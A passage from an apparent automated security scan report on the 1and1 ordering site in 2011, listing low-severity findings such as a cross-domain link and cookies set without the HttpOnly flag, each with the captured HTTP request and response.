Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="195" height="99" src="//img.1und1.de/OdinPrice/yellow/xxl/dollar/29/00/none/month-star.png" alt="from 29.00 &#8364;/month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="195" height="99" src="//img.1und1.de/OdinPrice/yellow/xxl/dollar/29/00/none/month-star.png" alt="from 29.00 &#8364;/month*"></span>
...[SNIP]...

4.18. http://order.1and1.com/xml/order/eshopupselling

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="158" height="126" src="//img.1und1.de/OdinPrice/yellow/xxl/dollar/0/00/none/month-star.png" alt="ab 0.00 &#8364;/Monat*"><span class="horz-xxl-price-text offer">
...[SNIP]...

5. Cookie without HttpOnly flag set
There are 172 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://order.1and1.com/xml/order

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 14:50:49 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7f633103f81ccc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a
Content-Length: 0
Content-Type: text/plain


5.2. http://order.1and1.com/xml/order

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 14:50:50 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: variant.configname=2010-04-14; Expires=Fri, 07-Apr-2079 18:04:57 GMT; Path=/
Set-Cookie: variant=QUM6ZGVmYXVsdA==; Expires=Fri, 07-Apr-2079 18:04:57 GMT; Path=/
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; Expires=Fri, 07-Apr-2079 18:04:57 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


5.3. http://order.1and1.com/xml/order/AboutUs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/AboutUs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.about HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:36:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:50:20 GMT; Path=/
ETag: e6a6b2f2d5c47aa1786c232b8ba23026
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20254


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.4. http://order.1and1.com/xml/order/AboutUs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/AboutUs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/AboutUs HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:35:59 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=40ed56ac00b05400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/AboutUs;jsessionid=976EECE32E6B69E9E9B7889A1B137418.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.5. http://order.1and1.com/xml/order/CloudDynamicServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/CloudDynamicServer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5ace75f3e6dc4c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=135525E4885300E7C3599BEAAA938DAF.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.6. http://order.1and1.com/xml/order/CloudDynamicServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.7. http://order.1and1.com/xml/order/Contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Contact HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:33 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=10de75d96fe89000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Contact;jsessionid=294ADA4924BDE22465D7CF384C1F0CF1.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.8. http://order.1and1.com/xml/order/Domaininfo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Domaininfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:18 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=3bGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:51:26 GMT; Path=/
ETag: e798faa6f23cc4cbfdd5cb74e552057f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20508


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.9. http://order.1and1.com/xml/order/Domaininfo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Domaininfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Domaininfo HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:04 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=79161ecc06ae0c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Domaininfo;jsessionid=073389361EEDA54793A65D36511F2C39.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.10. http://order.1and1.com/xml/order/DomaininfoMove

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:23:49 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:37:56 GMT; Path=/
ETag: d905b74707fbe92fe8473f766eeb9ddf
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23686


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.11. http://order.1and1.com/xml/order/DomaininfoMove

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/DomaininfoMove HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
